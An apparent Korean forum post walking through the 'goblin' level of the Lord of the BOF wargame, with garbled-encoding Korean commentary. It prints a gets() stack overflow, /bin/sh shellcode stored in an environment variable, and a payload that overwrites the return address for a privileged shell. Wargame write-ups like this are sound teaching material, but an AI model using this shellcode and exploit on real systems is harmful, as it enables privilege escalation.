|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8605 [º¹»ç]
Connecting to 192.168.0.22:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: cobolt
Password:
Last login: Tue Jul 1 13:02:01 from 192.168.0.20
[cobolt@localhost cobolt]$ bash2
[cobolt@localhost cobolt]$ ls -al
total 48
drwx------ 2 cobolt cobolt 4096 Jul 1 13:03 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 cobolt cobolt 3262 Jul 1 13:03 .bash_history
-rw-r--r-- 1 cobolt cobolt 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 cobolt cobolt 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 cobolt cobolt 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 cobolt cobolt 333 Feb 26 2010 .emacs
-rw-r--r-- 1 cobolt cobolt 3394 Feb 26 2010 .screenrc
-rwsr-sr-x 1 goblin goblin 11824 Feb 26 2010 goblin
-rw-r--r-- 1 root root 193 Mar 29 2010 goblin.c
[cobolt@localhost cobolt]$ cat goblin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/
int main()
{
char buffer[16];
gets(buffer);
printf("%s\n", buffer);
}
===============================
¼Ò½º Äڵ带 º¸¸é mainÇÔ¼öÀÇ ÀÎÀÚ°ª
int argc¿Í char *argv[]°¡ ¾ø´Ù.
gets ÇÔ¼ö·Î ¹öÆÛ º¯¼ö¿¡ ³Ö´Âµ¥
¾Æ½Ã´Ù½ÃÇÇ getsÇÔ¼ö´Â °æ°è¼±À» °Ë»çÇÏÁö ¾Ê°í
µ¥ÀÌÅ͸¦ ¹«Á¶°Ç Áý¾î ³Ö´Âµ¥.
·¹µåÇÞ 6.2´Â...
¸Þ¸ð¸®ÀÇ ±¸Á¶Áß ½ºÅÃÀÇ ±¸Á¶´Â ¾Æ·¡¿Í °°Àº ¸ð¾çÀÌ´Ù.
[ ³ôÀº ÁÖ¼Ò ] ¡ç ½ºÅÃÀÇ ¹Ù´Ú (main¿¡¼ mallocÇÑ º¯¼ö µî)
---------------------
Return Address ¡ç °¡Àå ¸ÕÀú µ¤¾î¾ß ÇÒ ºÎºÐ
---------------------
Saved EBP (Base Pointer)
---------------------
buffer[16] ¡ç Ãë¾àÇÑ ¹öÆÛ (°¡Àå ³·Àº ÂÊ¿¡ À§Ä¡ÇÔ)
---------------------
[ ³·Àº ÁÖ¼Ò ] ¡ç ½ºÅÃÀÇ ²À´ë±â (ESP°¡ ¿©±â¼ ½ÃÀÛÇÔ)
Áï, ASLR, Stack Canary¿Í °°Àº ¸Þ¸ð¸® º¸È£±â¹ýÀÌ Àû¿ëµÇÁö ¾Ê´Ù.
char buffer°¡ 16¹ÙÀÌÆ® ±× À§¿¡
½ºÅà ÇÁ·¹ÀÓ Æ÷ÀÎÅÍ¿¡ ¾Æ¹«·± ¹®ÀÚ³ª ³Ö´Â´Ù.
\x90...
NOP Sled(No Operation Sled... ³Ò½ä¸Å)
\x90Àº NOPÀ̹ǷΠ¾Æ¹«·± ½ÇÇàÀ» ÇÏÁö ¾Ê´Â´Ù.
±×·³ 20¹ÙÀÌÆ®¸¸ \x90À¸·Î ä¿ì°í ±× µÚ¿¡ ¸®ÅÏ ¾îµå·¹½º¸¦
¿øÇÏ´Â ÁÖ¼Ò·Î ´ëÀÔÇϸé?
±×°ÍÀÌ ½©ÄÚµå¶ó¸é ½©À» µû´Â ¿ø¸®°¡ µÇ´Â °ÍÀÌ´Ù.
p.s. 25¹ÙÀÌÆ® ½©Äڵ尡 ¾Æ¹«¸®Çصµ ÀÛµ¿ÀÌ ¾È µÇ¼
Á» ´õ ±ä ½©Äڵ带 ³ÖÀ¸´Ï ´ÙÀ½ ±ÇÇÑÀÇ ½©ÀÌ µûÁü.
===============================
[cobolt@localhost cobolt]$ ./goblin
f
f
[cobolt@localhost cobolt]$ ./goblin
abcd
abcd
[cobolt@localhost cobolt]$ export SHELLCODE=$(python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"')
[cobolt@localhost cobolt]$ vi ex_shell.c
[cobolt@localhost cobolt]$ cat ex_shell.c
#include <stdio.h>
int main(void)
{
printf("%p\n", getenv("SHELLCODE"));
return 0;
}
[cobolt@localhost cobolt]$ gcc -o ex_shell ex_shell.c
[cobolt@localhost cobolt]$ ./ex_shell
0xbffffdfd
[cobolt@localhost cobolt]$ (python -c 'print "\x90"*20+"\xfd\xfd\xff\xbf"';cat) | ./goblin
my-pass
euid = 503
[??????????????????] |
Hit : 1288 Date : 2025/07/02 05:00
|
1617, 
1/81 
